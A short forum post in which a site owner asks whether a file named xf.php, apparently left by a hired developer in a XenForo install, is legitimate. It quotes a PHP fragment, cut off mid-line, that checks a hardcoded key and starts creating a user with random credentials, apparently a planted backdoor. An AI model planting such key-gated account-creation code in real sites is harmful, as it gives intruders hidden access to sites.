xenforo developer may have added an exploit file

Status: This content is read-only, or is not open for further replies.

MR X

Guest

offline

OP
Sep 4, 2025
0
83

so i hired a dev on fiverr to make me an addon, it took way to long to complete by the time frame so i fired him, then some time later re-hired him to actually finish it, garbage work was done, but apparently he may or may not have uploaded a file named xf.php in /home/domain-name/public_html/data/xf.php, this is not an official xenforo file is it? because within it is.

PHP:

Code:

if ($key == 'dfdasfasfsjd544fjjkl') {
    // Create a new user with random credentials
    $registration =...